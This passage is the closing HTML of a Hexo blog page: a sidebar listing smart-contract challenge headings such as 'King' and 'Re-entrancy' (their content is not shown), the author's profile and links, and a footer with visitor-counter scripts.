<span class="nav-text">Attack</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#9-King"><span class="nav-number">9.</span> <span class="nav-text">9.King</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Code-8"><span class="nav-number">9.1.</span> <span class="nav-text">Code</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Analyze-8"><span class="nav-number">9.2.</span> <span class="nav-text">Analyze</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Attack-8"><span class="nav-number">9.3.</span> <span class="nav-text">Attack</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#10-Re-entrancy"><span class="nav-number">10.</span> <span class="nav-text">10.Re-entrancy</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Code-9"><span class="nav-number">10.1.</span> <span class="nav-text">Code</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Analyze-9"><span class="nav-number">10.2.</span> <span class="nav-text">Analyze</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Attack-9"><span class="nav-number">10.3.</span> <span class="nav-text">Attack</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="bcYng"
      src="https://raw.githubusercontent.com/bcYng-w/images/main/touxaing.png">
  <p class="site-author-name" itemprop="name">bcYng</p>
  <div class="site-description" itemprop="description">前程似锦</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">11</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/bcYng-w" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;bcYng-w" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://mail.qq.com/cgi-bin/qm_share?t=qm_mailme&email=2384417651@qq.com" title="E-Mail → https:&#x2F;&#x2F;mail.qq.com&#x2F;cgi-bin&#x2F;qm_share?t&#x3D;qm_mailme&amp;email&#x3D;2384417651@qq.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 2022-2-14 – 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">bcYng</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

<div class="theme-info">
  <div class="powered-by"></div>
  <span class="post-count">博客全站共24.5k字</span>
</div>


    <script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

    <span id="busuanzi_container_site_pv">总访问量<span id="busuanzi_value_site_pv"></span>次</span>
    <span class="post-meta-divider">|</span>
    <span id="busuanzi_container_site_uv">总访客数<span id="busuanzi_value_site_uv"></span>人</span>
    <span class="post-meta-divider">|</span>
<!-- 不蒜子计数初始值纠正 -->
<script>
$(document).ready(function() {

    var int = setInterval(fixCount, 50);  // 50ms周期检测函数
    var countOffset = 20000;  // 初始化首次数据

    function fixCount() {            
       if (document.getElementById("busuanzi_container_site_pv").style.display != "none")
        {
            $("#busuanzi_value_site_pv").html(parseInt($("#busuanzi_value_site_pv").html()) + countOffset); 
            clearInterval(int);
        }                  
        if ($("#busuanzi_container_site_pv").css("display") != "none")
        {
            $("#busuanzi_value_site_uv").html(parseInt($("#busuanzi_value_site_uv").html()) + countOffset); // 加上初始数据 
            clearInterval(int); // 停止检测
        }  
    }
       	
});
</script> 

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  
  <script color='0,0,255' opacity='0.5' zIndex='-1' count='99' src="/lib/canvas-nest/canvas-nest.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
